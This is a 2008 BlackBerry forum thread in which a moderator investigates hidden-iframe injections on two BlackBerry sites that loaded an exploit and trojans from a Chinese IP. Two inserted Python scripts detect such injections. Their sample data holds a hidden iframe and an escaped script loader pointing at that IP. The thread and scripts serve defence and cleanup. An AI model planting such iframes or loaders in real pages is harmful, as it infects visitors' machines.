Thumbs Must Hurt
Posts: 63
Join Date: May 2005
Model: 8310
Carrier: AT&T
Google saying BlackBerryCool is harmful?
04-16-2008, 02:02 PM
Malware Warning
Try searching BlackBerryCool on Google then clicking the link... what's up with that?
Retired BBF Moderator
Posts: 10,157
Join Date: Aug 2005
Model: 9000
OS: 4.6.0.xxx
Carrier: AT&T

04-16-2008, 02:03 PM
Lol! Google is now telling me where not to go
Last edited by Sith_Apprentice : 04-16-2008 at 08:29 PM.
BBF Wap Mod
Posts: 11,010
Join Date: Mar 2006
Location: Virginia Beach
Model: 9000
OS: DOS 3.1
PIN: INK STICK
Carrier: Tmobile

04-16-2008, 02:08 PM
hahahahaa
BBF Moderator & BBNews Editor
Posts: 35,718
Join Date: Oct 2004
Location: North of the moss line
Model: 9xx0
OS: 4.7sumtin
PIN: t low
Carrier: Cingular/AT&T

04-16-2008, 02:09 PM
I saw that yesterday. Must we all pass some Googly test now?
BBF Moderator
Posts: 6,769
Join Date: Feb 2006
Location: The 'burbs east of Seattle.
Model: 8220
Carrier: T-Mobile

04-16-2008, 02:14 PM
Nice to see someone appointing themselves as the Internet Morality Police. Microsoft was really slacking in this area... 
1st Step in Troubleshooting: Do you have a BlackBerry Data Plan?
2nd Step in Troubleshooting: Pull the Battery.
BBFAQ Sysop
Posts: 3,702
Join Date: Oct 2007
Location: Asia Pacific
Model: 8900
OS: X 10.5.7
PIN: Alt+Shift+H
Carrier: Globe Telecom-PH

04-16-2008, 02:21 PM
Tgtbt
Thumbs Must Hurt
Posts: 91
Join Date: Apr 2008
Model: 8310
OS: 4.5.0.37
Carrier: Vodafone

04-16-2008, 02:22 PM
Same thing for der-blackberry-blog.de (german BB blog)..
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 02:37 PM
Google normally displays that warning for sites that have been compromised and may be running exploits and malware. Or sites that deliberately download malware. There are plenty of both.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 03:01 PM
There is a problem with blackberrycool.com. I went to the site in my unpatched vm and a malware file tried to load. I'm still investigating it, but if someone knows how I can contact the site owner, please PM me. It looks like their WordPress may have been attacked. In the meantime, I'd suggest not visiting the site until it's fixed.
I'll check the German blog in a bit also.
BlackBerry Extraordinaire
Posts: 1,084
Join Date: Jul 2007
Model: 8310
OS: 4.2.2.194
PIN: 2453b651
Carrier: att/verizon

04-16-2008, 04:28 PM
thats just funny.
BlackBerry Master
Posts: 3,192
Join Date: Jul 2007
Model: 8830
PIN: N/A
Carrier: Sprint

04-16-2008, 04:46 PM
Quote, originally posted by daphne:
    There is a problem with blackberrycool.com. I went to the site in my unpatched vm and a malware file tried to load. I'm still investigating it, but if someone knows how I can contact the site owner, please PM me. It looks like their WordPress may have been attacked. In the meantime, I'd suggest not visiting the site until it's fixed.
    I'll check the German blog in a bit also.
I had that attack hit me as well.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 04:53 PM
No offense, but it really is not funny. There is no humor in having a site hacked, or getting infected from visiting a hacked site. I'm sure the site owners won't think it's funny to have to shut down their sites while it gets cleaned up and patched.
The German blog has the same problem. See these Google results for the Chinese IP address.
61.155.8.157 - Google Search
Somehow iframes with links to a URL on that IP address have been injected on the Blackberrycool.com and the blog pages. The hidden iframe goes to the malicious URL where an obfuscated javascript exploit loads the malware file. I will have more info on it later. I'm trying to contact the owner of blackberrycool and will have a German malware researcher I know try to contact the blog owner.
It's possible the exploit doesn't work on fully patched PCs, but I wouldn't risk it. The exploit definitely works on my Windows XP totally unpatched virtual machine.
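The injection daphne describes above (a hidden iframe pointing at a bare IP address, plus an obfuscated script loader) is the kind of thing a site owner can check for mechanically rather than waiting for Google's warning. The script below is an added example written for this thread; it is not code from daphne, from the forum, or from either affected site. The page it scans is constructed for the demo: the zero-size iframe to 61.155.8.157 mirrors what the thread describes, but the path on that URL, the allow-listed widget host and the escaped script payload are made up.

```python
"""Flag injected hidden iframes and obfuscated script loaders in a page.

Added example; not code from the thread or from either site mentioned in it.
"""
import ipaddress
import re
from urllib.parse import urlparse

# Deliberately simple regexes; a production scanner should use a real HTML parser.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Typical loader tells: an escaped/packed payload handed to eval or document.write.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode")

# Constructed sample page: the hidden iframe mirrors the attack described in the
# thread (bare Chinese IP, zero-size frame); the path on that URL is made up.
SAMPLE_PAGE = """<html><body>
<h1>Blog</h1>
<iframe src="http://61.155.8.157/x/index.php" width=0 height=0 frameborder=0></iframe>
<iframe src="http://widgets.example.com/embed?id=42" width="425" height="344"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//61.155.8.157/x.js%22%3E%3C/script%3E'));</script>
<script>var counter = 1;</script>
</body></html>"""


def parse_attrs(tag: str) -> dict:
    """Return lower-cased attribute -> value for one opening tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag)}


def is_hidden(attrs: dict) -> bool:
    """Zero/one-pixel frames or display:none are the usual injection footprint."""
    def tiny(value: str) -> bool:
        try:
            return int(value.strip().rstrip("px")) <= 1
        except ValueError:
            return False
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


def host_is_bare_ip(url: str) -> bool:
    """True when the iframe points at a raw IP instead of a hostname."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def scan_html(html: str, trusted_hosts=()) -> list:
    """Return (kind, detail, reasons) for every suspicious iframe or script."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(0))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden iframe")
        if host_is_bare_ip(src):
            reasons.append("src is a bare IP")
        if host and host not in trusted_hosts:
            reasons.append("src host not on allow-list")
        if reasons:
            findings.append(("iframe", src, reasons))
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hits = [marker for marker in OBFUSCATION_MARKERS if marker in body]
        if hits:
            findings.append(("script", body[:60], hits))
    return findings


if __name__ == "__main__":
    for kind, detail, why in scan_html(SAMPLE_PAGE, trusted_hosts=("widgets.example.com",)):
        print(f"[{kind}] {detail!r}: {', '.join(why)}")
```

Run it against a saved copy of the homepage (fetched with a non-browser tool from a throwaway system, as daphne did with an unpatched VM) rather than by loading the page in a browser. The allow-list is the important knob: any iframe host the site did not put there is worth a look, hidden or not.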
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 04:57 PM
Quote, originally posted by djm2:
    I had that attack hit me as well.
Did you find out how it happened? Was it from a WordPress vulnerability?
I got a copy of the malicious javascript, haven't had time to check it just yet.
Thumbs Must Hurt
Posts: 107
Join Date: Mar 2008
Location: Downingtown, PA
Model: 8310
PIN: 24546662
Carrier: AT&T

04-16-2008, 04:57 PM
Does WordPress open a back door to this type of stuff?
George
U.S. Army Reserve; talk to me 
--BB 8310 w/AT&T (PIN 24546662)
--Garmin GPS, returned, got BBTracker
--Dalwhinnie Single Malt
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 05:02 PM
There have been a lot of vulnerabilities found in WordPress. I just read something about exploits of the latest version of WordPress. I'll try to find it in a bit.
BBF Moderator & BBNews Editor
Posts: 35,718
Join Date: Oct 2004
Location: North of the moss line
Model: 9xx0
OS: 4.7sumtin
PIN: t low
Carrier: Cingular/AT&T

04-16-2008, 05:04 PM
 Detective Daphne on the case! You are good!
Quote, originally posted by daphne:
    There have been a lot of vulnerabilities found in WordPress. I just read something about exploits of the latest version of WordPress. I'll try to find it in a bit.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 05:13 PM
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 05:15 PM
Quote, originally posted by JSanders:
    Detective Daphne on the case! You are good!
Heh... this is what gets my blood racing, because it makes me angry that there is so much hacking, exploits and such that cause so many problems for innocent people, site owners and users.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 07:37 PM
Ok, good news... it looks like Blackberrycool.com has removed the malicious code from the homepage. I didn't check the entire site. Hopefully whatever allowed the attack has been patched because sometimes sites will be attacked repeatedly.
The malicious javascript on the Chinese IP address is detected by some but not all Anti-virus programs. Scan report of 32 AV scanners here:
Virustotal. MD5: 00e5351eb184f8d920105ec149da9e61 Downloader VBS/Gen_troj.A Generic.XPL.ADODB.0E3AA240
There are about 13 malware files dropped in a vulnerable system by visiting the sites, some detected by the AVs, some not. Here's a few of the names: Worm.Win32.Socks.by, Trojan-Downloader.Win32.Delf.gti, Trojan-Downloader.Win32.Agent.neo, Trojan-Downloader.Win32.Injecter.ek.
Anyone who visited either site recently (don't know how long they've been hacked), should run a full av scan with updated definitions, and maybe a second scan with one of the online AV scanners.
Trend Micro HouseCall - Free Online Virus and Spyware Scan - Trend Micro USA
ewido - anti-spyware and anti-malware solutions
Free Virus Scan - Kaspersky Lab
Or if you think you are infected and need more help, PM me.
The German blog is still compromised. If anyone here speaks German, maybe you could try to contact the site owner? So far, I haven't had any luck, and I don't read or speak German. There is contact information here:
Der-blackberry-blog.de - Der Blackberry Blog
Any of you folks with websites, it's very important to keep your server OS and server-side software patched and updated. That includes WordPress, any php apps, forums, everything. Just like an unpatched home PC can be compromised, websites and web servers can be compromised when not kept updated and secured. In recent months, it's become an epidemic, with even well known sites being hit. Examples here:
IT Business
Hackers expand massive IFRAME attack to prime sites - Network World
Compromised web sites serve more malware than malicious ones
Edit to add... when Google shows that warning for a site, it should be taken seriously, not as a joke. 
Last edited by daphne : 04-16-2008 at 07:41 PM.
Reason: one more thing...
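The advice above about keeping WordPress and the rest of the server stack patched, and the observation that the iframe was sitting right in the homepage, both come down to the same thing: knowing what changed on the server and how far behind the install is. The script below is an added example written for this thread, not code from daphne, the forum or either site. It keeps a baseline of file hashes for a web root and reports what was added or modified, and it reads the WordPress version out of wp-includes/version.php and compares it with 2.5, which the thread names as the current release at the time. The skipped directories and the simulated compromise inside demo() are assumptions constructed for the demo.

```python
"""Baseline-and-diff integrity check for a web root, plus a WordPress version check.

Added example; not code from the thread, the forum, or either affected site.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Directories that churn constantly and would drown the diff in noise
# (an assumption about a typical WordPress layout, not from the thread).
SKIP_PREFIXES = ("wp-content/uploads/", "wp-content/cache/")

# The thread names 2.5 as the current WordPress release at the time.
CURRENT_WP = (2, 5)
VERSION_RE = re.compile(r"\$wp_version\s*=\s*['\"]([0-9.]+)['\"]")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    manifest = {}
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if rel.startswith(SKIP_PREFIXES):
            continue
        manifest[rel] = sha256_file(p)
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Files that appeared, disappeared, or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
    }


def parse_wp_version(text: str):
    """Return the $wp_version tuple from version.php text, or None if absent."""
    m = VERSION_RE.search(text)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def wp_is_outdated(root, current=CURRENT_WP):
    """True when the install is older than `current`; None if no version.php."""
    vfile = Path(root) / "wp-includes" / "version.php"
    if not vfile.exists():
        return None
    v = parse_wp_version(vfile.read_text())
    return v is not None and v < current


def demo():
    """Build a tiny constructed web root, baseline it, simulate the attack, diff."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        theme = root / "wp-content" / "themes" / "default"
        theme.mkdir(parents=True)
        (root / "wp-includes").mkdir()
        (root / "wp-includes" / "version.php").write_text("<?php\n$wp_version = '2.3.3';\n")
        (root / "index.php").write_text("<?php require './wp-blog-header.php';\n")
        footer = theme / "footer.php"
        footer.write_text("</body>\n</html>\n")

        baseline = build_manifest(root)   # taken while the site is known-clean
        outdated = wp_is_outdated(root)

        # Simulated compromise (constructed): an iframe appended to the theme footer
        # and a new PHP file dropped next to it.
        footer.write_text("</body>\n</html>\n"
                          "<iframe src=\"http://61.155.8.157/\" width=0 height=0></iframe>\n")
        (theme / "x.php").write_text("<?php echo 'dropped';\n")

        return diff_manifests(baseline, build_manifest(root)), outdated


if __name__ == "__main__":
    changes, outdated = demo()
    print("WordPress older than %s: %s" % (".".join(map(str, CURRENT_WP)), outdated))
    for kind, paths in changes.items():
        for p in paths:
            print(f"{kind:9} {p}")
```

In practice, store the manifest off the server (a compromised host can rewrite its own baseline) and re-run the diff from cron; anything in "added" or "modified" that did not come from a deliberate update is the first place to look for injected iframes.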
Thumbs Must Hurt
Posts: 91
Join Date: Apr 2008
Model: 8310
OS: 4.5.0.37
Carrier: Vodafone

04-16-2008, 07:48 PM
Quote, originally posted by daphne:
    The German blog is still compromised. If anyone here speaks German, maybe you could try to contact the site owner? So far, I haven't had any luck, and I don't read or speak German. There is contact information here:
    Der-blackberry-blog.de - Der Blackberry Blog
Ye, I'll let him know asap.
BBF Wap Mod
Posts: 11,010
Join Date: Mar 2006
Location: Virginia Beach
Model: 9000
OS: DOS 3.1
PIN: INK STICK
Carrier: Tmobile

04-16-2008, 07:52 PM
Thanks Daphne
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 07:56 PM
Quote, originally posted by MaxDiggity:
    Ye, I'll let him know asap.
Thank you very much. 
Thumbs Must Hurt
Posts: 91
Join Date: Apr 2008
Model: 8310
OS: 4.5.0.37
Carrier: Vodafone

04-16-2008, 08:06 PM
Done, used the form on the blog to contact him (using a linux OS >.> ), let's hope he reads it too. 
Would've let him know earlier but I couldn't have explained it very well...just directed him to this thread now.
BlackBerry Extraordinaire
Posts: 1,084
Join Date: Jul 2007
Model: 8310
OS: 4.2.2.194
PIN: 2453b651
Carrier: att/verizon

04-16-2008, 08:10 PM
Is this the 100-webpage exploit? Or 10,000 or something, that within hours spread to 200k+?
Like 2-3 weeks ago. I imagine it's going to hit more sites.
CrackBerry Addict
Posts: 658
Join Date: Apr 2007
Location: Ottawa
Model: 8800
PIN: N/A
Carrier: Rogers

04-16-2008, 08:27 PM
Hey guys,
Thanks for all the heads up we got on this today. I don't do any of the codey/design stuff myself, but our site manager spent the better part of today trying to figure out what's going on. From his grumblings, I've managed to gather that Google is pointing to some directories that don't exist anymore (old job board, before a revamp) as the source of the malicious code. We've taken down a few of our third party add-ons, such as text link ads in the hope that it might fix the problem. Over the last month or so, I've noticed a few spammish things sneaking onto the site, but we've been fairly quick to squash 'em.
Daphne, thanks a ton for your poking around, I'm sure it'll help us figure out what's going on. My best guess is that there's a hole in our version of WordPress, and we just need to update to the latest one.
If anyone has any further info to volunteer, feel free to contact me directly at simon at blackberry cool dot com.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 08:35 PM
Hi Simon,
Thanks for posting. The malicious hidden iframe link was right on the homepage, but it's gone now. Kudos to the site manager for getting it taken care of quickly. I did read some info about even the latest version of WordPress, 2.5, being hacked. Some info here:
WordPress › Support » WordPress 2.5 Hacked
This one was hacked with the same malicious iframe with the IP to China.
WordPress › Support » Wordpress 2.5 site hacked!
Quote, originally posted by BlackBerryCoolSimon:
    Hey guys,
    Thanks for all the heads up we got on this today. I don't do any of the codey/design stuff myself, but our site manager spent the better part of today trying to figure out what's going on. From his grumblings, I've managed to gather that Google is pointing to some directories that don't exist anymore (old job board, before a revamp) as the source of the malicious code. We've taken down a few of our third party add-ons, such as text link ads in the hope that it might fix the problem. Over the last month or so, I've noticed a few spammish things sneaking onto the site, but we've been fairly quick to squash 'em.
    Daphne, thanks a ton for your poking around, I'm sure it'll help us figure out what's going on. My best guess is that there's a hole in our version of WordPress, and we just need to update to the latest one.
    If anyone has any further info to volunteer, feel free to contact me directly at simon at blackberry cool dot com.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 08:45 PM
Quote, originally posted by wabbit:
    this is the 100 webpage exploit? or 10000 or something that within hrs spread to 200k+ ?
    like 2-3 weeks ago. i imagine it going to hit more sites.
Not sure -- just read this today. No doubt there will be more. Site hacking and malware are big money makers now, run by organized crime.
SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-16-2008, 08:55 PM
Quote, originally posted by MaxDiggity:
    Done, used the form on the blog to contact him (using a linux OS >.> ), let's hope he reads it too.
    Would've let him know earlier but I couldn't have explained it very well...just directed him to this thread now.
Great, thanks again!! Using a linux os was a good way to go there. 
Thumbs Must Hurt
Posts: 91
Join Date: Apr 2008
Model: 8310
OS: 4.5.0.37
Carrier: Vodafone

04-16-2008, 09:11 PM
Quote, originally posted by daphne:
    Great, thanks again!! Using a linux os was a good way to go there.
Least I could do, you did all the work ;P
For common good (read: to keep myself from spamming) I have now decided that 4 am is a good time to hit the hay.
-sneaks out-
BlackBerry Master
Posts: 3,192
Join Date: Jul 2007
Model: 8830
PIN: N/A
Carrier: Sprint

04-17-2008, 06:28 AM
Quote, originally posted by daphne:
    Did you find out how it happened? Was from a WordPress vulnerability?
    I got a copy of the malicious javascript, haven't had time to check it just yet.
I don't know how it happened, just that Kaspersky blocked it. BTW, thanks again for that recommendation!
Family Alpha-Geek
Posts: 3,597
Join Date: Jan 2005
Location: Denville, NJ.
Model: 8330
OS: 4.5.0.131
PIN: G!!!
Carrier: Sprint

04-17-2008, 07:36 AM
I know lots of people that are simply banning any Chinese address from accessing their content. Sucks to be blocked, but this attack is getting too common, and with the Chinese authorities being the complete joke that they are, site owners are left with few options. Especially those operating their web sites on a shoestring budget, on a server sitting in their bedroom closet.
CrackBerry Addict
Posts: 658
Join Date: Apr 2007
Location: Ottawa
Model: 8800
PIN: N/A
Carrier: Rogers

04-17-2008, 10:36 AM
All fixed! The Google warning's been lifted after some tweaking last night. Thanks again everyone who helped out.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-17-2008, 10:41 AM
I just noticed the Google warning is no longer there. But the blog der-blackberry-blog.de still has the warning.
New Member
Posts: 5
Join Date: Jun 2006
Model: 8900
OS: 5.0.0.90
Carrier: Vodafone

04-18-2008, 02:29 PM
Working on my blog atm. We think the database is the problem. The blog is now offline. Thank you for your message.
Der BlackBerry-Blog
UPDATE: Still fixing the problem. The blog is online for testing. Please don't visit this site at the moment.
Last edited by funrun : 04-18-2008 at 02:32 PM.
BBF Spam Killer Moderator
Posts: 5,029
Join Date: May 2007
Location: on a sunny beach
Model: 8330
OS: 4.5.0.138
PIN: 0101110110
Carrier: Verizon - It's the Network

04-18-2008, 09:13 PM
Quote, originally posted by funrun:
    Working on my blog atm. We think the database is the problem. The blog is now offline. Thank you for your message.
    Der BlackBerry-Blog
    UPDATE: Still fixing the problem. The blog is online for testing. Please don't visit this site at the moment.
Hi funrun,
I'm sorry your blog got hacked, but I'm glad to hear you are working on it.